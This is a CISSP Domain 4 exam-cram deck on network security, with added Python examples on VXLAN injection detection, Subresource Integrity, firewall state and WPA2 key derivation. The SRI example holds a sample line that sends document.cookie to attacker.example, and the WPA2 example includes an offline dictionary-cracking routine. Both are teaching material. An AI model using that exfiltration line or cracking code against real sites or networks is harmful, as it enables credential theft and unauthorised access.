CISSP-2022 Exam Cram Domain 4

This document provides an overview of topics covered in Domain 4 of the CISSP exam, which focuses on communication and network security. Key points covered include secure design principles for network architectures like micro-segmentation using Software Defined Networks (SDN) and Virtual Extensible Local Area Networks (VXLAN). Emerging wireless technologies like Li-fi and Zigbee are also discussed. The document then covers cellular networking updates in 5G and threats, as well as an overview of content delivery networks and common TCP and UDP ports.

Uploaded by pazi_441395439

CISSP EXAM CRAM

THE COMPLETE COURSE

Communication and
Network Security
DOMAIN 4: COMMUNICATION & NETWORK SECURITY

4.1 Implement secure design principles in network architectures
4.2 Secure network components
4.3 Implement secure communication channels according to design
what's new in domain 4?
4.1 Assess and implement secure design principles in network architectures

Micro-segmentation
– Software Defined Networks (SDN)
– Virtual eXtensible Local Area Network (VXLAN)
– Encapsulation
– Software-Defined Wide Area Network (SD-WAN)

Wireless Networks
– Li-Fi
– Zigbee
– Satellite

Cellular Networks
– 4G, 5G

Content Distribution Networks (CDN)

For more cybersecurity exam prep tutorials, follow us on Youtube at Inside Cloud and Security
network architectures
Virtual Extensible LAN (VXLAN)
network virtualization enabling network segmentation at high scale.
overcomes VLAN scale limitations: the 12-bit VLAN ID allows 4096 VLANs, whereas the 24-bit VXLAN Network Identifier (VNI) allows roughly 16 million VXLAN segments.
a tunneling protocol that encapsulates an Ethernet frame (layer 2) in a UDP packet (destination port 4789) carried across an IP (layer 3) underlay between VXLAN Tunnel Endpoints (VTEPs).
explained in RFC 7348, the VXLAN RFC.
layer 2 can generally only be attacked from within (e.g. MAC spoofing, or flooding to cause DoS), such as by a rogue host.
caveat: the VXLAN header carries no authentication, so any host that can deliver UDP to a VTEP can inject frames into any VNI; restrict which underlay addresses may reach VTEPs on UDP 4789, and use IPsec between VTEPs on an untrusted underlay (the RFC's security considerations discuss this).
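The encapsulation described above, as an added example that is not part of the slide deck: it builds a VXLAN-encapsulated frame with the RFC 7348 header layout, parses it back, and applies the one check the protocol itself cannot make, namely whether the outer packet came from a known VTEP. The inner frame, the VNI and the VTEP addresses are constructed for the example.

```python
"""Added example (not from the slide deck): build and parse a VXLAN-encapsulated
Ethernet frame (RFC 7348 header layout) and flag a frame whose outer source is
not a known VTEP. The inner frame, VNI and VTEP addresses are constructed."""
import struct

VXLAN_UDP_PORT = 4789          # IANA port for VXLAN (RFC 7348)
VXLAN_FLAG_VNI_VALID = 0x08    # the 'I' flag: VNI field is valid

# assumed underlay addresses of the legitimate tunnel endpoints
KNOWN_VTEPS = {"10.0.0.11", "10.0.0.12"}

# constructed inner frame: broadcast ARP from a tenant host
INNER_FRAME = (bytes.fromhex("ffffffffffff")        # destination MAC
               + bytes.fromhex("020000000001")      # source MAC
               + b"\x08\x06"                        # EtherType ARP
               + b"\x00" * 28)                      # ARP body (zeroed)


def build_vxlan_payload(vni: int, inner_frame: bytes) -> bytes:
    """UDP payload = 8-byte VXLAN header + original Ethernet frame.
    Header layout: flags(1) reserved(3) VNI(3) reserved(1)."""
    if not 0 <= vni < 1 << 24:
        raise ValueError("VNI is a 24-bit field")
    header = bytes([VXLAN_FLAG_VNI_VALID, 0, 0, 0]) + struct.pack("!I", vni << 8)
    return header + inner_frame


def parse_vxlan(payload: bytes) -> dict:
    """Decode the VXLAN header and the inner Ethernet header."""
    if len(payload) < 8 + 14:
        raise ValueError("truncated VXLAN packet")
    if not payload[0] & VXLAN_FLAG_VNI_VALID:
        raise ValueError("VNI-valid flag not set")
    vni = int.from_bytes(payload[4:7], "big")
    inner = payload[8:]
    return {
        "vni": vni,
        "dst_mac": inner[0:6].hex(":"),
        "src_mac": inner[6:12].hex(":"),
        "ethertype": int.from_bytes(inner[12:14], "big"),
    }


def classify(outer_src_ip: str, outer_dst_port: int, payload: bytes,
             known_vteps=KNOWN_VTEPS):
    """Verdict for one outer UDP packet seen on the underlay.
    The VXLAN header carries no authentication, so the only thing that
    ties a frame to a tenant segment is who sent the outer packet."""
    if outer_dst_port != VXLAN_UDP_PORT:
        return "not-vxlan", None
    info = parse_vxlan(payload)
    if outer_src_ip not in known_vteps:
        return "injection", info   # rogue host writing into a VNI it was never assigned
    return "ok", info


if __name__ == "__main__":
    pkt = build_vxlan_payload(5000, INNER_FRAME)
    for src in ("10.0.0.11", "192.0.2.99"):
        verdict, info = classify(src, VXLAN_UDP_PORT, pkt)
        print(f"{src:>12} -> {verdict}: VNI {info['vni']} "
              f"inner {info['src_mac']} -> {info['dst_mac']}")
```

Run it as a script to see the same tenant broadcast accepted from a VTEP and flagged from an unknown underlay address; in a real deployment the equivalent of `KNOWN_VTEPS` is an ACL on the underlay that only permits UDP 4789 between the VTEP addresses.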
network architectures
Software Defined Networks (SDN)
a network architecture approach that enables the network to be intelligently and centrally controlled, or 'programmed,' using software, and has the capacity to reprogram the data plane at any time.
use cases include SD-LAN and SD-WAN.
separating the control plane from the data plane opens up a number of security challenges: the controller becomes a single high-value target, and the controller-to-switch channel (e.g. OpenFlow) carries the network's entire forwarding policy.
SDN vulnerabilities can include man-in-the-middle (MITM) attacks on that channel and denial of service (DoS) against the controller: secure the channel with mutually authenticated TLS!
network architectures
Software Defined Wide-Area Networks (SD-WAN)
enables users in branch offices to remotely connect to an enterprise's network.
enables use of many network services – MPLS, LTE, and broadband internet, etc. – to securely connect users to applications.
security is based largely on IP security (IPsec) VPN tunnels, next-gen firewalls (NGFWs), and the micro-segmentation of application traffic.
uses a centralized control function for intelligent routing, and secure access service edge (SASE) to decentralize connectivity by delivering the security stack from the cloud edge instead of backhauling all traffic to a data center.
network architectures
Light Fidelity (Li-Fi)
uses the modulation of light intensity to transmit data (uses LEDs).
can safely function in areas otherwise susceptible to electromagnetic interference.
can theoretically transmit at speeds of up to 100 Gbit/s.
Li-Fi only requires working LED lights.
a limitation of visible light is that it cannot penetrate opaque walls; the flip side is that the signal stays inside the room, which reduces the eavesdropping exposure that RF wireless has.
network architectures
Zigbee (IEEE 802.15.4 PAN)
a short-range wireless PAN (Personal Area Network) technology developed to support automation, machine-to-machine communication, remote control and monitoring of IoT devices (e.g. an IoT smart home hub).
supports both centralized and distributed security models, and mesh topology.
assumes that the symmetric (AES-128) keys used are transmitted securely (encrypted in transit).
during pre-configuration of a new device, a single key might be sent unprotected (or protected only by a well-known default link key), creating a brief vulnerability: an attacker sniffing the join can capture the network key.
CELLULAR NETWORKING
5th Generation Cellular (5G)
faster speeds and lower latency.
unlike 4G, 5G does not send the subscriber's permanent identity (the IMSI from the SIM card) in the clear over the air: it is encrypted into a concealed identifier (SUCI), and identities can be assigned to each device.
some air interface threats, such as session hijacking and identity catching, are dealt with in 5G.
the standalone (SA) version of 5G will be more secure than the non-standalone (NSA) version.
NSA anchors the control signaling of 5G networks to the 4G core.

CELLULAR NETWORKING
5th Generation Cellular (5G): threats
the Diameter protocol, which provides authentication, authorization, and accounting (AAA) in the 4G core, will be a target for as long as NSA deployments depend on that core.
because 5G has to work alongside older tech (3G/4G), old vulnerabilities may be targeted (e.g. forcing a downgrade to a legacy network).
because the scale of IoT endpoint counts on 5G is exponentially greater, DDoS is a concern.
some carriers originally launched an NSA version of 5G, which continues to rely on availability of the 4G core.
content delivery networks (cdn)
a geographically distributed network of proxy servers and their data centers.
goal is fast and highly available content delivery by distributing content spatially relative (close) to users.
CDNs serving JavaScript have been targeted to inject malicious content into pages: a compromised or hijacked script is served to every site that embeds it. Subresource Integrity (SRI) lets a page pin the expected hash of the script so the browser refuses a modified copy.
examples: video and audio streaming, software downloads, etc.
vendors in the CDN space offer DDoS protection and web application firewalls (WAF).
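The SRI defense against a tampered CDN script, as an added example that is not from the slide deck: it computes the integrity attribute a page should carry and mimics the browser-side check that rejects a modified script. The script contents and the CDN URL are constructed for the example.

```python
"""Added example (not from the slide deck): compute and verify a Subresource
Integrity (SRI) hash for a CDN-hosted script. The script text and the CDN URL
are constructed; a real page hashes the exact bytes the CDN serves."""
import base64
import hashlib


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return the integrity attribute value '<algo>-<base64 digest>' as browsers expect."""
    if algo not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI allows only sha256, sha384 or sha512")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_verify(content: bytes, integrity: str) -> bool:
    """Mimic the browser check: accept if any listed hash matches the fetched bytes."""
    for token in integrity.split():
        algo, _, _ = token.partition("-")
        try:
            if sri_hash(content, algo) == token:
                return True
        except ValueError:
            continue   # an unknown algorithm token is ignored, as a browser does
    return False


def script_tag(src: str, content: bytes) -> str:
    """Emit the <script> tag a page should use for a third-party script."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


# constructed sample: the library a page embeds, and a tampered copy of it
ORIGINAL_JS = b"window.lib = { add: (a, b) => a + b };\n"
TAMPERED_JS = ORIGINAL_JS + b"fetch('https://attacker.example/?c=' + document.cookie);\n"

if __name__ == "__main__":
    print(script_tag("https://cdn.example/lib.js", ORIGINAL_JS))   # assumed CDN URL
    integrity = sri_hash(ORIGINAL_JS)
    print("original accepted:", sri_verify(ORIGINAL_JS, integrity))
    print("tampered accepted:", sri_verify(TAMPERED_JS, integrity))
```

The `crossorigin="anonymous"` attribute matters: without CORS the browser cannot read cross-origin bytes to hash them and treats the resource as failing the check. SRI pins a specific version, so a legitimate library update also requires updating the hash.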
THE OSI MODEL
Layer  Name          Bottom-up mnemonic   Top-down mnemonic
7      Application   Away                 All
6      Presentation  Pizza                People
5      Session       Sausage              Seem
4      Transport     Throw                To
3      Network       Not                  Need
2      Data Link     Do                   Data
1      Physical      Please               Processing
("Please Do Not Throw Sausage Pizza Away" reads from layer 1 upward; "All People Seem To Need Data Processing" reads from layer 7 downward.)
THE OSI MODEL
7 Application   SSH, HTTP, FTP, LPD, SMTP, Telnet, TFTP, EDI, POP3, IMAP, SNMP, NNTP, S-RPC, and SET
6 Presentation  encryption protocols and format types, such as ASCII, EBCDIC, TIFF, JPEG, MPEG, MIDI
5 Session       SMB, RPC, NFS, and SQL
4 Transport     SPX, SSL, TLS, TCP, and UDP
3 Network       ICMP, RIP, OSPF, BGP, IGMP, IP, IPsec, IPX, NAT, and SKIP
2 Data Link     ARP, SLIP, PPP, L2F, L2TP, PPTP, FDDI, ISDN
1 Physical      EIA/TIA-232, EIA/TIA-449, X.21, HSSI, SONET, V.24, V.35, Bluetooth, 802.11 Wi-Fi, and Ethernet
(Exam sources place SSL/TLS at layer 4; in practice TLS sits between the transport and application layers, and BGP runs over TCP even though it is listed with the layer 3 routing protocols.)
common TCP/UDP ports
Protocol                                      TCP/UDP   Port
File Transfer Protocol (FTP)                  TCP       20 (data) / 21 (control)
Secure Shell (SSH)                            TCP       22
Telnet                                        TCP       23
Simple Mail Transfer Protocol (SMTP)          TCP       25
Domain Name System (DNS)                      TCP/UDP   53
Dynamic Host Configuration Protocol (DHCP)    UDP       67 (server) / 68 (client)
Trivial File Transfer Protocol (TFTP)         UDP       69
Hypertext Transfer Protocol (HTTP)            TCP       80
Post Office Protocol (POP3)                   TCP       110
Network Time Protocol (NTP)                   UDP       123
NetBIOS                                       TCP/UDP   137 / 138 / 139
Internet Message Access Protocol (IMAP)       TCP       143
Simple Network Mgmt Protocol (SNMP)           UDP       161 (agent) / 162 (trap)
Border Gateway Protocol (BGP)                 TCP       179
Lightweight Directory Access Protocol (LDAP)  TCP/UDP   389
HTTP over SSL/TLS (HTTPS)                     TCP       443
LDAP over TLS/SSL (LDAPS)                     TCP       636
FTP over TLS/SSL (implicit FTPS)              TCP       989 (data) / 990 (control)
Telnet, FTP, HTTP, POP3, IMAP on 143 and SNMP v1/v2c carry credentials or data in the clear; SSH and the TLS-wrapped ports (443, 636, 989/990) are the secure substitutes.
TCP/IP vs OSI
(figure not reproduced: the four TCP/IP layers – Application, Transport, Internet, Link – map onto OSI layers 5–7, 4, 3, and 1–2 respectively.)
TCP vs udp
No.  TCP                                                   UDP
1    Connection-oriented                                   Connectionless
2    Byte stream (ordered, sequenced)                      Message-oriented (each datagram independent)
3    No support for multicasting/broadcasting              Supports multicasting/broadcasting
4    Full-duplex, ordered delivery                         No ordering; datagrams may arrive out of order or duplicated
5    Reliable delivery (acknowledgements, retransmission)  Unreliable (best-effort) delivery
6    TCP packet is called a segment                        UDP packet is called a datagram
7    Error detection (checksum) plus flow and congestion control   Checksum only (optional in IPv4); no flow or congestion control
Security relevance: UDP's lack of a handshake is why spoofed-source amplification attacks (DNS, NTP, SNMP) work, whereas TCP's handshake forces the target to hear back from the source before much state is committed (though see SYN flood).
cabling types & throughput
(table not reproduced)
UTP = unshielded twisted pair
standard network topologies
(figure: MESH, BUS, RING, STAR)
standard network topologies
STAR
employs a centralized connection device, which can be a simple hub or switch.
each system is connected to the central hub by a dedicated segment.
the central device is a single point of failure (and, if it is a hub, a single collision domain).

standard network topologies
MESH
connects systems to all other systems using numerous paths.
a partial mesh topology connects many systems to many other systems.
provides redundant connections to systems, allowing multiple segment failures without seriously affecting connectivity.

standard network topologies
RING
connects each system as points on a circle.
the connection medium acts as a unidirectional transmission loop.
only one system can transmit data at a time; traffic management is performed by a token.
Token Ring is a ring-based network.

standard network topologies
BUS
connects each system to a trunk or backbone cable.
all systems on the bus can transmit data simultaneously, which can result in collisions.
a collision occurs when two systems transmit data at the same time; the signals interfere with each other.
classic (coaxial or hub-based) Ethernet is a bus network; modern switched Ethernet is wired as a star, with each switch port forming its own collision domain.


analog vs digital
Analog
Communications occur with a continuous signal that varies in frequency, amplitude, phase, voltage, and so on.
The variances in the continuous signal produce a wave shape (as opposed to the square shape of a digital signal).
The actual communication becomes altered and corrupted because of attenuation over long distances and interference.

Digital
Communications occur through the use of a discontinuous electrical signal and a state change or on-off pulses.
More reliable than analog signals over long distances or when interference is present, because the receiver only has to distinguish two states rather than reproduce a waveform exactly.
Uses voltage levels where voltage on represents a value of 1 and voltage off represents a value of 0. These on-off pulses create a stream of binary data.
synchronous vs asynchronous
Some communications are synchronized with some sort of clock or timing activity; they are either synchronous or asynchronous:

Synchronous
Communications rely on a timing or clocking mechanism based on either an independent clock or a time stamp embedded in the data stream.
Typically able to support very high rates of data transfer. example: networking

Asynchronous
Communications rely on start and stop delimiter bits to manage the transmission of data.
Best suited for smaller amounts of data.
example: public switched telephone network (PSTN) modems


baseband vs broadband
Baseband
can support only a single communication channel.
uses a direct current applied to the cable. A current at a higher level represents the binary signal 1, and a lower level represents binary 0.
is a form of digital signal. example: Ethernet

Broadband
can support multiple simultaneous signals. uses frequency modulation to support numerous channels, each supporting a distinct communication session.
suitable for high throughput rates, especially when several channels are multiplexed.
is a form of analog signal. examples: TV, cable modem, ISDN, DSL, T1, T3
broadcast, multicast, unicast
Broadcast, multicast, and unicast technologies determine how many destinations a single transmission can reach:
Broadcast technology supports communications to all possible recipients.
Multicast technology supports communications to multiple specific recipients.
Unicast technology supports only a single communication to a specific recipient.
csma, csma/ca, csma/cd
Carrier Sense Multiple Access (CSMA) was developed to decrease the chances of collisions when two or more stations start sending their signals over the data link layer. It requires that each station first check (sense) the state of the medium before sending.

CSMA
does not directly address collisions.

CSMA/CA (collision avoidance)
attempts to avoid collisions before they happen: a station that senses a busy medium waits a random back-off, and may first announce its intent to transmit (RTS/CTS), so only one station is granted permission to communicate at any given time.

CSMA/CD (collision detection)
responds to collisions by having each member of the collision domain wait for a short but random period of time before starting the process over.

csma, csma/ca, csma/cd
No.  CSMA/CD (detection)                                  CSMA/CA (avoidance)
1    effective after a collision                          effective before a collision
2    used in wired networks                               commonly used in wireless networks
3    only reduces the recovery time                       minimizes the possibility of a collision
4    resends the data frame whenever a conflict occurs    first transmits the intent to send before data transmission
5    used in the 802.3 (Ethernet) standard                used in the 802.11 (Wi-Fi) standard
6    more efficient than simple CSMA                      similar to simple CSMA in terms of efficiency
token passing, polling
Token passing
performs communications using a digital token. A system may transmit only while it holds the token; once its transmission is complete, it releases the token to the next system.
prevents collisions in ring networks.

Polling
performs communications using a master-slave configuration. The primary system polls each secondary system in turn to ask whether it has a need to transmit data.
used by SDLC.
network segmentation
Intranet
a private network that is designed to host the same information services found on the Internet.

Extranet
a section of an organization's network that has been sectioned off to act as an intranet for the private network but also serves information to the public Internet or to business partners: a cross between Internet and intranet.

DMZ / perimeter network
an extranet for public consumption is typically labeled a demilitarized zone (DMZ) or perimeter network.
used to control traffic and isolate static/sensitive environments: Internet-facing services live in the DMZ so that a compromise there does not give direct access to the internal network.
network segmentation
Boosting Performance
can improve performance through an organizational scheme in which systems that often communicate are located in the same segment, while systems that rarely or never communicate are located in other segments.

Reducing Communication Problems
reduces congestion and contains communication problems, such as broadcast storms, to individual subsections of the network.

Providing Security
can also improve security by isolating traffic and user access to those segments where they are authorized.
BLUETOOTH (IEEE 802.15.1)
Bluetooth personal area networks (PANs), standardized as IEEE 802.15.1, are another area of wireless security concern.
Connects headsets for cell phones, mice, keyboards, GPS, and other devices.
Connections are set up using pairing, where the primary device scans the 2.4 GHz radio frequencies for available devices.
Legacy pairing uses a 4-digit PIN (often 0000) to reduce accidental pairings but is not actually secure. Newer Secure Simple Pairing and Secure Connections use ECDH key agreement, but their "Just Works" mode authenticates neither side and so gives no protection against a man-in-the-middle during pairing.
mobile system attacks
BLUEJACKING (annoyance)
Think of it as a high-tech version of ding-dong-ditch, where savvy pranksters push unsolicited messages to engage or annoy other nearby Bluetooth users by taking advantage of a loophole in the technology's messaging options.

BLUESNARFING (data theft)
With bluesnarfing, thieves wirelessly connect to some early Bluetooth-enabled mobile devices without the owner's knowledge to download and/or alter phonebooks, calendars, or worse.

BLUEBUGGING (remote control)
An attack that grants hackers remote control over the features and functions of a Bluetooth device. This could include the ability to turn on the microphone to use the phone as an audio bug.
wireless technologies (cont)
Version    Speed       Frequency
802.11     2 Mbps      2.4 GHz
802.11a    54 Mbps     5 GHz
802.11b    11 Mbps     2.4 GHz
802.11g    54 Mbps     2.4 GHz
802.11n    200+ Mbps   2.4 and 5 GHz
802.11ac   1 Gbps      5 GHz
The 802.11 standard also defines WEP, whose RC4-based encryption is broken and must not be used.

SSID BROADCAST
Wireless networks traditionally announce their SSID on a regular basis with a beacon frame.
When the SSID is broadcast, any device in range can automatically detect and connect to the network.
Hiding the SSID is considered "security through obscurity": it is still detectable in the probe requests and association frames sent by clients.
SSID = service set identifier
TKIP
Temporal Key Integrity Protocol
was designed as the replacement for WEP without the need to replace legacy hardware: it keeps WEP's RC4 cipher but adds per-packet key mixing, a longer IV and the Michael message integrity check.
implemented into 802.11 wireless networking under the name WPA (Wi-Fi Protected Access). TKIP is itself deprecated today.

CCMP
Counter Mode with Cipher Block Chaining Message Authentication Code Protocol
created to replace WEP and TKIP/WPA.
uses AES (Advanced Encryption Standard) with a 128-bit key in CCM mode, which provides both confidentiality (counter mode) and integrity (CBC-MAC) for each frame.
used with WPA2, which replaced WEP and WPA.

wpa2
introduced a new encryption scheme known as the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP).
CCMP is based on the AES encryption scheme.
caveat: WPA2-Personal derives its master key from the pre-shared passphrase and the SSID, so a weak passphrase can be recovered offline from a captured 4-way handshake; WPA3's SAE handshake was introduced to close that gap.
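The WPA2-Personal key derivation, as an added example that is not from the slide deck: it derives the pairwise master key (PMK) with the PBKDF2 parameters IEEE 802.11i specifies and then runs a small offline dictionary attack against it. The SSID and the wordlist are constructed; a real attacker verifies each guess against the captured 4-way handshake MIC rather than a bare PMK, but the cost per guess (one PBKDF2 run) is the same, which is why passphrase strength is what decides the outcome.

```python
"""Added example (not from the slide deck): derive the WPA2-Personal PMK from a
passphrase and SSID and run an offline dictionary attack against it. PBKDF2
parameters are those of IEEE 802.11i; the SSID and wordlist are constructed."""
import hashlib
import hmac
from typing import Iterable, Optional


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2 passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def crack_pmk(target_pmk: bytes, ssid: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline attack: recompute the PMK for each candidate and compare.
    In a real attack the comparison is against the handshake MIC instead of
    the PMK itself, but the work per candidate is identical."""
    for candidate in wordlist:
        try:
            if hmac.compare_digest(wpa2_pmk(candidate, ssid), target_pmk):
                return candidate
        except ValueError:
            continue   # too short or too long to be a valid passphrase
    return None


# constructed inputs: the SSID seen in a beacon and a tiny wordlist
CAPTURED_SSID = "CorpGuest"
WORDLIST = ["admin", "password", "letmein1", "CorpGuest2022", "Summer2023!"]

if __name__ == "__main__":
    pmk = wpa2_pmk("CorpGuest2022", CAPTURED_SSID)
    print("PMK:", pmk.hex())
    print("recovered passphrase:", crack_pmk(pmk, CAPTURED_SSID, WORDLIST))
    strong = wpa2_pmk("xK9#vQ2!mZpL7wRs", CAPTURED_SSID)
    print("strong passphrase recovered:", crack_pmk(strong, CAPTURED_SSID, WORDLIST))
```

Because the SSID is the PBKDF2 salt, precomputed tables only work per SSID, which is one reason attackers target common default SSIDs; it is not a substitute for a long random passphrase or for WPA2-Enterprise (802.1X) where no shared passphrase exists.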


fibre channel & FCoE
Fibre Channel
a high-speed network technology used for storage area networks (SANs), carrying block-level SCSI traffic between servers and storage arrays. (NAS, by contrast, serves files over IP using NFS or SMB.)

Understand FCoE
FCoE (Fibre Channel over Ethernet) is used to encapsulate Fibre Channel communications over Ethernet networks.

iSCSI
iSCSI (Internet Small Computer System Interface) is a networking storage standard based on IP: SCSI commands are carried over TCP (port 3260).
storage protocols do not encrypt data in transit by default; keep the storage network isolated from general traffic, and use iSCSI's CHAP authentication (or IPsec) where the storage network is shared.
site survey
The process of investigating the presence, strength, and reach of wireless access points deployed in an environment.
usually involves walking around with a portable wireless device, taking note of the wireless signal strength, and mapping this on a plot or schematic of the building.
eap, peap, LEAP
Extensible Authentication Protocol (EAP)
an authentication framework, not a single method. allows for new authentication technologies to be compatible with existing wireless or point-to-point connection technologies (e.g. EAP-TLS, PEAP, EAP-TTLS carried over 802.1X).

Protected EAP (PEAP)
encapsulates EAP methods within a TLS tunnel that provides authentication and potentially encryption, so the inner credential exchange (commonly MSCHAPv2) is not exposed over the air. Clients must validate the server certificate, or a rogue access point can harvest the inner credentials.

Lightweight EAP (LEAP)
a Cisco proprietary alternative to TKIP for WPA, developed to address deficiencies in TKIP before the 802.11i/WPA2 system was ratified as a standard. LEAP's challenge/response is vulnerable to offline dictionary attacks and is deprecated.
MAC FILTERING
a list of authorized wireless client interface MAC addresses, used by a wireless access point to block access to all non-authorized devices.
caveat: MAC addresses are sent in the clear in every frame and are trivially changed in software, so filtering deters only casual misuse.

CAPTIVE PORTALS
an authentication technique that redirects a newly connected wireless web client to a portal access control page before granting network access.
ANTENNA TYPES
Monopole, Panel, Dipole, Loop, Cantenna, Yagi, Parabolic

Loop: reaches multiple frequencies and is more commonly used for TV and RFID systems. Omnidirectional if horizontally mounted.
Monopole: an omnidirectional antenna that can send and receive signals in all directions perpendicular to the line of the antenna itself.
Dipole: an omnidirectional antenna essentially composed of two monopoles. Generates a powerful signal in a restricted space.
Panel: flat devices that focus from only one side of the panel.
Parabolic: used to focus signals from very long distances or weak sources.
Yagi: crafted from a straight bar with cross sections to catch specific radio frequencies in the direction of the main bar.
Cantenna: constructed from tubes with one sealed end. They focus along the direction of the open end of the tube.
network devices
Firewalls
essential tools in managing and controlling network traffic. A firewall is a network device used to filter traffic.

Switch
repeats traffic only out of the port on which the destination is known to exist. Switches offer greater efficiency for traffic delivery, create separate collision domains, and improve the overall throughput of data. usually layer 2, sometimes layer 3.

Routers
used to control traffic flow on networks and are often used to connect similar networks and control traffic flow between the two. They can function using statically defined routing tables, or they can employ a dynamic routing system. layer 3.

Gateways
a gateway connects networks that are using different network protocols. also known as protocol translators; can be stand-alone hardware devices or a software service. network gateways are usually placed at layer 3, but a protocol translator may operate at any layer up to 7 (e.g. an email gateway).

network devices
Repeaters, Concentrators, and Amplifiers
used to strengthen the communication signal over a cable segment as well as connect network segments that use the same protocol. layer 1.

Bridges
used to connect two networks (even networks of different topologies, cabling types, and speeds) in order to connect network segments that use the same protocol. layer 2.

Hubs
used to connect multiple systems and connect network segments that use the same protocol. A hub is a multiport repeater: every frame is repeated to every port, so any attached host can sniff all traffic. layer 1.

LAN Extenders
a remote access, multilayer switch used to connect distant networks over WAN links.
lan & wan technologies
WAN connections and communication links can include private circuit technologies and packet-switching technologies.

Private circuit technologies use dedicated physical circuits.
— dedicated or leased lines
— PPP (Point-to-Point Protocol)
— SLIP (Serial Line Internet Protocol)
— ISDN (Integrated Services Digital Network)
— DSL (Digital Subscriber Line)

Packet-switching technologies use virtual circuits instead of dedicated physical circuits. efficient and cost effective.
— X.25, Frame Relay
— Asynchronous Transfer Mode (ATM)
— Synchronous Data Link Control (SDLC)
— High-Level Data Link Control (HDLC)
firewalls
Static Packet-Filtering Firewalls
operate at layer 3 and up. filters traffic by examining data from a message header (addresses, ports, protocol, flags).

Application-Level Firewalls
operate at layer 7 of the OSI model. filters traffic based on a single internet service, protocol, or application.

Circuit-Level Firewalls
used to establish communication sessions between trusted partners. They operate at the Session layer (layer 5) of the OSI model.
SOCKS is an example of a circuit-level firewall.

firewalls
Stateful Inspection Firewalls
evaluate the state, session, or the context of network traffic.

Deep Packet Inspection Firewalls
a filtering mechanism that operates typically at the application layer in order to filter the payload contents of a communication rather than only on the header values.

Firewall and state
Stateless (static packet-filtering) firewalls
watch network traffic and restrict or block packets based on source and destination addresses or other static values.
not 'aware' of traffic patterns or data flows, so a packet crafted to look like return traffic (e.g. with the ACK bit set) is let through.
typically faster and perform better under heavier traffic loads.

Stateful inspection firewalls
can watch traffic streams from end to end, keeping a connection table and admitting inbound packets only for sessions an inside host actually opened.
are aware of communication paths and can implement various IP security functions such as tunnels and encryption.
better at identifying unauthorized and forged communications.
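The stateless-versus-stateful distinction above, as an added example that is not from the slide deck: a toy filter runs the same constructed traffic through a classic "established" ACL (header bits only) and through a connection table, so the forged-reply case that only state can catch is visible. Addresses, ports and the packet list are made up for the example.

```python
"""Added example (not from the slide deck): a toy packet filter that runs the
same constructed traffic through a stateless 'established' rule and through a
stateful connection table, to show what state buys you. Addresses, ports and
the packet list are made up for the example."""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str        # TCP flags, e.g. "S", "SA", "A", "PA", "R"
    direction: str    # "out" = inside -> Internet, "in" = Internet -> inside


def stateless_allow(p: Packet) -> bool:
    """Classic static ACL: permit all outbound; permit inbound only if the ACK
    or RST bit is set, i.e. it *looks like* a reply. Header bits only, no memory."""
    if p.direction == "out":
        return True
    return "A" in p.flags or "R" in p.flags


class StatefulFilter:
    """Permits inbound packets only for connections an inside host opened."""

    def __init__(self) -> None:
        self.table = set()   # (inside_ip, inside_port, outside_ip, outside_port)

    def allow(self, p: Packet) -> bool:
        if p.direction == "out":
            if p.flags == "S":                   # new connection: remember it
                self.table.add((p.src, p.sport, p.dst, p.dport))
            return True
        key = (p.dst, p.dport, p.src, p.sport)   # inbound: rewrite as inside-first
        if key not in self.table:
            return False                          # nobody inside asked for this
        if "R" in p.flags or "F" in p.flags:     # teardown: forget the entry
            self.table.discard(key)
        return True


# constructed traffic: one legitimate HTTPS session, then an ACK-scan probe
TRAFFIC: List[Packet] = [
    Packet("10.1.1.5", 51000, "203.0.113.10", 443, "S", "out"),    # inside opens HTTPS
    Packet("203.0.113.10", 443, "10.1.1.5", 51000, "SA", "in"),    # genuine reply
    Packet("10.1.1.5", 51000, "203.0.113.10", 443, "A", "out"),    # handshake done
    Packet("198.51.100.7", 40000, "10.1.1.20", 445, "A", "in"),    # ACK scan of SMB
    Packet("198.51.100.7", 40000, "10.1.1.20", 445, "S", "in"),    # plain SYN to SMB
]


def run(traffic: List[Packet]) -> List[Tuple[str, bool, bool]]:
    """Return (flags, stateless verdict, stateful verdict) for each packet in order."""
    stateful = StatefulFilter()
    return [(p.flags, stateless_allow(p), stateful.allow(p)) for p in traffic]


if __name__ == "__main__":
    for p, (flags, sl, sf) in zip(TRAFFIC, run(TRAFFIC)):
        print(f"{p.direction:>3} {p.src}:{p.sport} -> {p.dst}:{p.dport} [{flags}]"
              f"  stateless={'allow' if sl else 'drop'}  stateful={'allow' if sf else 'drop'}")
```

The fourth packet is the point of the example: an unsolicited ACK aimed at an internal SMB port passes the stateless rule because it carries the ACK bit, while the stateful filter drops it because no inside host opened that connection. The price of state is the table itself, which is why a stateful device is the one a SYN flood aims to exhaust.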
modern firewalls
Web Application Firewall, aka "WAF"
protects web applications by filtering and monitoring HTTP traffic between a web application and the Internet.
typically protects web applications from common attacks like XSS, CSRF, and SQL injection.
some come pre-configured with OWASP rulesets.

Next Generation Firewall, aka "NGFW"
a deep-packet inspection firewall that moves beyond port/protocol inspection and blocking.
adds application-level inspection, intrusion prevention, and brings intelligence from outside the firewall.
types of firewalls
Deep packet inspection
inspects and filters both the header and payload of a packet that is transmitted through an inspection point.
can detect protocol non-compliance, spam, viruses, intrusions.

Unified Threat Management, aka "UTM"
a multifunction device (MFD) composed of several security features in addition to a firewall; may include IDS, IPS, a TLS/SSL proxy, web filtering, QoS management, bandwidth throttling, NAT, VPN anchoring, and antivirus.
more common in small and medium businesses (SMB).

Types of firewalls
Network Address Translation Gateway
allows private subnets to communicate with other cloud services and the Internet but hides the internal network from Internet users.
in a cloud VPC the NAT gateway sits in a public subnet, and the private subnets' route tables and network access control lists (NACLs) determine what may reach it.

Content / URL filter
